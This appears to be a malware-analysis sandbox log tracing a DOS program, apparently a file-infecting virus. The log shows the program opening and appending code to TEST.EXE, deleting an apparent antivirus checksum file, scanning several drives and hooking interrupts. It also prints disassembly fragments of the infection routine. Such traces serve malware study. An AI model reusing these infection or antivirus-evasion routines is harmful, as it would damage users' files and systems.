2018-12-25T12:23:32.444277813Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.44837421Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.450503368Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.452403702Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.455011235Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.456943565Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.458928002Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.461688439Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.463703028Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.465661828Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.467813204Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.469212297Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.47055886Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.472446595Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.4745529Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.476284281Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.478796242Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.480671742Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.482444783Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.484835293Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.487382303Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.489086806Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.494651925Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.498307319Z 76 PC: 15150 | Terminate with return code (Return code = '200')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":9667,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:29.451952754Z 25 PC: 15198 | Get default drive
2018-12-25T12:23:29.45370398Z 71 PC: 151a7 | Get current directory
2018-12-25T12:23:29.456639355Z 26 PC: 153fd | Set disk transfer address
2018-12-25T12:23:29.457769026Z 78 PC: 15408 | Find first file
2018-12-25T12:23:29.464328312Z 67 PC: 1542b | Get or set file attributes
2018-12-25T12:23:29.47499263Z 67 PC: 15433 | Get or set file attributes
2018-12-25T12:23:29.491361741Z 61 PC: 15438 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:23:29.49842808Z 87 PC: 1543e | Get or set file date and time
2018-12-25T12:23:29.499806284Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:23:29.505952758Z 66 PC: 154a6 | Move file pointer
2018-12-25T12:23:29.507333962Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-25T12:23:29.515289597Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-25T12:23:29.517361907Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-25T12:23:29.51938073Z 64 PC: 15550 | Write file or device (Write 8 bytes on handle 5)
2018-12-25T12:23:29.526552637Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-25T12:23:29.528877875Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-25T12:23:29.53706821Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov al, byte ptr [0x5a01]
0x15581: xor cl, dl
0x15583: xor dl, cl
0x15585: into
0x15586: cmp word ptr [bp + di - 0x57], dx
0x15589: or cl, bl
0x1558b: jmp 0x15558
0x1558d: leave
0x1558e: loope 0x155a0
0x15590: enter -0x67a5, -0x19
0x15594: sbb word ptr [di], di
0x15596: xchg ax, cx
0x15597: xchg ax, bp
0x15598: retf
2018-12-25T12:23:29.539887579Z 64 PC: 1557b | Write file or device (Write 24 bytes on handle 5)
2018-12-25T12:23:29.543090294Z 66 PC: 15587 | Move file pointer
2018-12-25T12:23:29.544789602Z 66 PC: 155a8 | Move file pointer
2018-12-25T12:23:29.54758163Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-25T12:23:29.550254031Z 67 PC: 15345 | Get or set file attributes
2018-12-25T12:23:29.5563432Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-25T12:23:29.562047727Z 87 PC: 155cc | Get or set file date and time
2018-12-25T12:23:29.563601355Z 62 PC: 155d0 | Close file
2018-12-25T12:23:29.570934872Z 67 PC: 155da | Get or set file attributes
2018-12-25T12:23:29.581281678Z 79 PC: 1541f | Find next file
2018-12-25T12:23:29.583784051Z 59 PC: 152c0 | Change current directory
2018-12-25T12:23:29.587974931Z 14 PC: 151d5 | Set default drive (Drive = 'C')
2018-12-25T12:23:29.589889562Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:29.590978477Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:29.596025572Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:29.599634416Z 59 PC: 151e0 | Change current directory
2018-12-25T12:23:29.605410295Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:29.606398686Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:29.614911651Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:29.621192045Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:30.916459918Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:30.927001579Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:30.928489592Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:30.933874539Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:30.936336826Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:30.938753577Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:30.941255123Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:30.943984816Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:30.951274057Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:30.954035744Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:30.979503685Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:30.982637546Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:30.985565165Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:30.988146264Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:30.990469047Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:30.993235997Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:31.001731724Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:31.009147849Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:31.010705791Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:31.067246598Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:31.086804895Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:31.090110431Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:31.097249602Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:31.132405744Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:31.140996045Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:31.143136989Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:31.149829384Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:31.152041346Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:31.154907437Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:31.158082307Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:31.160313582Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:31.166463063Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:31.175601927Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:31.22625583Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:31.229017186Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:31.232770475Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:31.234351796Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:31.235818203Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:31.239079419Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:31.245424638Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:31.254343898Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:31.256723503Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:31.265835438Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:31.275662494Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:31.284517493Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:31.298771183Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:31.308963927Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:31.315496451Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:31.318012252Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:31.323440636Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:31.324900925Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:31.32770701Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:31.329879882Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:31.331843234Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:31.342696469Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:31.345010643Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:31.354228483Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:31.357349324Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:31.36075673Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:31.362425182Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:31.364742289Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:31.368028802Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:31.37397692Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:31.382775053Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:31.384559511Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:31.398450635Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:31.580362423Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:31.583907714Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:31.589850734Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:31.770167647Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:31.777114734Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:31.778442133Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:31.784690577Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:31.786359149Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:31.788381477Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:31.79057799Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:31.792720966Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:31.799128831Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:31.801667076Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.005830654Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.008036494Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.010864769Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.012526747Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.013748064Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.016432378Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.022658926Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.028706989Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.030036107Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.059786372Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.069217452Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.072223002Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.079574651Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.089525958Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.096304209Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.098710137Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.104859704Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.106626013Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.109878645Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.112353644Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.114820111Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.123219637Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.126051693Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.139195458Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.142475789Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.145706686Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.147267179Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.149308429Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.152441502Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.158386627Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.165313063Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.166938421Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.173571397Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.470343861Z 14 PC: 151e9 | Set default drive (Drive = 'D')
2018-12-25T12:23:32.473271386Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.478428632Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.484447808Z 14 PC: 151f2 | Set default drive (Drive = 'E')
2018-12-25T12:23:32.486096866Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.490078861Z 14 PC: 15218 | Set default drive (Drive = 'A')
2018-12-25T12:23:32.492794543Z 59 PC: 15220 | Change current directory
2018-12-25T12:23:32.496408347Z 44 PC: 1523c | Get time 0x1523c: cmp cl, 5
0x1523f: jne 0x15244
0x15241: call 0x1534a
0x15244: cmp cl, 0xd
0x15247: jne 0x1524c
0x15249: call 0x15359
0x1524c: cmp cl, 0x1e
0x1524f: jne 0x15258
0x15251: lea dx, word ptr [bp + 0x290]
0x15255: call 0x15330
0x15258: cmp cl, 0x28
0x1525b: jne 0x15264
0x1525d: lea dx, word ptr [bp + 0x290]
0x15261: call 0x15330
0x15264: cmp cl, 0x32
0x15267: jne 0x15270
0x15269: lea dx, word ptr [bp + 0x2c7]
0x1526d: call 0x15330
0x15270: lea si, word ptr [bp + 0x195]
0x15274: lea di, word ptr [bp + 0x18d]
2018-12-25T12:23:32.521939405Z 53 PC: 14fba | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.52414764Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.525298505Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.526862967Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.528910743Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.530161948Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.531379913Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.533299544Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.534787486Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.536250027Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.538644428Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.540065068Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.541512245Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.543744525Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.545472195Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.54687673Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.549072758Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.55075908Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.552146513Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.55401439Z 37 PC: 14fcf | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.555648165Z 37 PC: 14fd7 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:23:32.556806979Z 37 PC: 14fdf | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:23:32.559155123Z 37 PC: 14fe7 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device')
2018-12-25T12:23:32.561578489Z 68 PC: 15eab | I/O control for devices (Set for = '� ��O�Э:E�t��ҭ3ɬ� �u��ŝ]_^ZY[�P�/��t�\�ЭXâЭX�SQRWV�������6έ�6̭�6ʭ2ɬ �t:�t��t�����2ɪ���6έ��3����t!�Э �u:E�t��� �u�����}��')
2018-12-25T12:23:32.739678853Z 64 PC: 1563b | Write file or device (Write 0 bytes on handle 1)
2018-12-25T12:23:32.741881937Z 37 PC: 15111 | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.742996642Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.744056239Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.746427464Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.747939186Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.74939405Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.751880092Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.753311889Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.754697448Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.757030747Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.758382859Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.759709047Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.762033721Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.763372461Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.764669434Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.7672579Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.768327134Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.769338621Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.770888936Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.771923362Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.773491058Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.775958256Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.778086459Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.779573827Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.781601974Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.783055744Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.784387109Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.786193287Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.788094698Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.789982987Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.792003329Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.793408887Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.795100946Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.797139577Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.798484291Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.799975592Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.801899438Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.803452611Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.805182265Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.807116046Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.808643323Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.81072033Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.812723437Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.814140713Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.81642704Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.81814423Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.819867387Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.822599928Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.824055775Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.825460619Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.827569599Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.829004491Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.83100181Z 76 PC: 15150 | Terminate with return code (Return code = '200')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":40,"Second":0,"TimeBased":true,"OriginalID":9667,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:30.202533738Z 25 PC: 15198 | Get default drive
2018-12-25T12:23:30.204090683Z 71 PC: 151a7 | Get current directory
2018-12-25T12:23:30.206887652Z 26 PC: 153fd | Set disk transfer address
2018-12-25T12:23:30.207916009Z 78 PC: 15408 | Find first file
2018-12-25T12:23:30.214477662Z 67 PC: 1542b | Get or set file attributes
2018-12-25T12:23:30.220091629Z 67 PC: 15433 | Get or set file attributes
2018-12-25T12:23:31.238852594Z 61 PC: 15438 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:23:31.254943095Z 87 PC: 1543e | Get or set file date and time
2018-12-25T12:23:31.256162551Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:23:31.262487455Z 66 PC: 154a6 | Move file pointer
2018-12-25T12:23:31.265684893Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-25T12:23:31.271451443Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-25T12:23:31.276242951Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-25T12:23:31.279418048Z 64 PC: 15550 | Write file or device (Write 6 bytes on handle 5)
2018-12-25T12:23:31.286777075Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-25T12:23:31.289569989Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-25T12:23:31.298916812Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: scasb al, byte ptr es:[di]
0x1557f: add byte ptr [si + 0x31], dl
0x15582: fbstp dword ptr [bx + di]
2018-12-25T12:23:31.302535303Z 64 PC: 1557b | Write file or device (Write 22 bytes on handle 5)
2018-12-25T12:23:31.305862129Z 66 PC: 15587 | Move file pointer
2018-12-25T12:23:31.307679723Z 66 PC: 155a8 | Move file pointer
2018-12-25T12:23:31.30996303Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-25T12:23:31.313049298Z 67 PC: 15345 | Get or set file attributes
2018-12-25T12:23:31.319311764Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-25T12:23:31.325363221Z 87 PC: 155cc | Get or set file date and time
2018-12-25T12:23:31.327128525Z 62 PC: 155d0 | Close file
